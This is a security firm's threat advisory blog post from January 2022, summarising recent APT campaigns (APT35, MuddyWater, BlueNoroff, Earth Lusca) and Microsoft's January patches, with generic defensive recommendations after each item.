Threat advisories

Top Middle East Cyber Threats – 24 January 2022

Jan-2022 7 min to read

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:

APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit

Hackers believed to be part of the Iranian APT35 state-backed group (aka ‘Charming Kitten’ or ‘Phosphorus’) have been observed leveraging Log4Shell attacks to drop a new PowerShell backdoor named ‘CharmPower’.

To exploit the Log4j vulnerability (CVE-2021-44228), the attackers chose one of the publicly available open-source JNDI Exploit Kits in GitHub.

The modular payload can handle C2 communications, perform system enumeration, and eventually receive, decrypt, and load additional modules.

For more details, please refer to our earlier advisories released on 13 Dec 2021 and 10 Jan 2022.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Monitor your network for abnormal behaviours and indicators of compromise (IoCs).
Block the indicators of compromise (IoCs) within respective security controls organization wide.
Ensure frequent backups are in place.

Microsoft issues 96 Security Updates in January 2022

Microsoft has issued 96 security updates, including patches for six zero-day vulnerabilities. Microsoft has addressed issues such as remote code execution (RCE) exploits, privilege escalation flaws, spoofing problems, and cross-site scripting (XSS) vulnerabilities. Microsoft Exchange Server, the Office software suite, Windows Defender, Windows Kernel, RDP, Cryptographic Services, Windows Certificate, and Microsoft Teams are all affected by the January 2022 security update.

This month, 89 vulnerabilities have been classified as Important. Microsoft has also announced a new Security Update Guide notification system that accepts standard email addresses rather than only Live IDs at signup.

The following is a comprehensive list of critical vulnerabilities:

Two of the Critical-rated patches released this month affect DirectX, while the other affects HEVC video extensions. Viewing a specially crafted media file has the potential to result in code execution. There is a fix for the Virtual Machine IDE Drive that could allow for privilege escalation, but the complexity of this bug is markedly high. Six fixes for information disclosure bugs are included in this month’s release. Most of these only result in leaks of unspecified memory contents. A flaw in the Remote Desktop Licensing Diagnoser, on the other hand, could allow an attacker to recover cleartext passwords from memory.

In recent Microsoft news, the company released an emergency fix for a bug affecting on-premise Exchange Servers earlier this month. A date-check malfunction bug prevented mail from moving smoothly through the transport queues of Exchange Server 2016 and Exchange Server 2019.

RECOMMENDATIONS

Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
Review the January 2022 “Release Notes” and “Deployment Information” for more details and apply the necessary patches as soon as possible.

MuddyWater uses PowGoop and Mori malware in new campaign

United States Cyber Command (USCYBERCOM) issued an alert on 13 January 2022, reporting malicious cyber operations by Iranian MOIS (Ministry of Intelligence and Security) sponsored MuddyWater APT (advanced persistent threat) group.

MuddyWater (also known as TEMP.Zagros, Static Kitten, Seedworm, and Mercury) is a threat group that primarily targets telecommunications, government, oil, defense, and finance sectors in the Middle East, Europe, and North America.

In this attack campaign, the MuddyWater cyber-espionage group mainly uses the PowGoop DLL Loader that designed to decrypt and run a PowerShell-based malware downloader.

JavaScript samples deployed on devices compromised using the PowGoop loader and a Mori backdoor sample featuring DNS tunneling communication capabilities and used in espionage campaigns.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files or attachments.
Don’t allow Macros for unknown MS Office files.
Enable software restriction policies and application whitelisting.
Ensure that email server is configured to block any suspicious attached files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and shared indicators of compromise (IoCs).
Block the indicators of compromise (IoCs) within respective security controls organization wide.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing / suspicious emails.

BlueNoroff APT launches a cryptocurrency stealing campaign

Researchers reported recent activities for BlueNoroff (APT38); a financially motivated group.

BlueNoroff shifted focus from hitting banks and SWIFT-connected servers to solely cryptocurrency businesses as the main source of the group’s illegal income.

These attackers even took the long route of building fake cryptocurrency software development companies in order to trick their victims into installing legitimate-looking applications that eventually receive backdoored updates.

Throughout its SnatchCrypto campaign, BlueNoroff abused trust in business communications: both internal chats between colleagues and interaction with external entities.

For the initial infection vector, they usually utilized zipped Windows shortcut files or weaponized Word documents used to fetch the next stage payload, a Visual Basic Script and Powershell Script that will install the last stage Windows executable payload.

SnatchCrypto campaign was found to be targeting multiple countries including the United Arab Emirates.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files or attachments.
Don’t allow Macros for unknown MS Office files.
Enable software restriction policies and application whitelisting.
Ensure that email server is configured to block any suspicious attached files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and shared indicators of compromise (IoCs).
Block the indicators of compromise (IoCs) within respective security controls organization wide.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing / suspicious emails.

Chinese APT Earth Lusca targets governmental entities in multiple countries

A recent report by Trend Micro described a newly attributed threat actor Earth Lusca. The actor has been active since 2019 but some of their operations were attributed before to other actors such as APT41, Earth Baku and Sparkling Goblin.

Earth Lusca operations were found to be targeting multiple countries including governmental entities in the United Arab Emirates.

The initial infection vector is either a malicious email attachment, watering hole or exploiting public-facing servers.

In their spear phishing campaigns, the attachment is either a compressed archive, LNK file (shortcut), exe file or a link to a malicious file hosted on compromised server or google drive.

In water hole attacks, they compromise a website that is usually visited by employees from the target entity and under certain conditions, the website would show an error message to update flash or fix a DNS error then offer the user the malicious executable as a solution.

In attacking public-facing servers, they used the proxyshell to target Outlook and Oracle GlassFish directory traversal.

Both aforementioned vulnerabilities have public exploits available. Moreover, the group utilized some existing malwares/tools used by other Chinese actors such as ShadowPad and Winnti.

The group relied on living off the land as well as using tools for their post-exploitation activities with Cobalt Strike being essential for their operations.

The group created services for persistence and used multiple techniques for privilege escalation such as print spooler abuse, UAC bypasses, DLL sideloading and BadPotato.

Earth Lusca used Mimikatz and ZeroLogon for credential access, proxies for pivoting, winrar to compress gathered information and megacmd to upload the compressed files to Mega drive (Mega is end-to-end encrypted which provides an advantage against DLP).

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files or attachments.
Don’t allow Macros for unknown MS Office files.
Enable software restriction policies and application whitelisting.
Ensure that email server is configured to block any suspicious attached files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and shared indicators of compromise (IoCs).
Block the indicators of compromise (IoCs) within respective security controls organization wide.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing / suspicious emails.

References: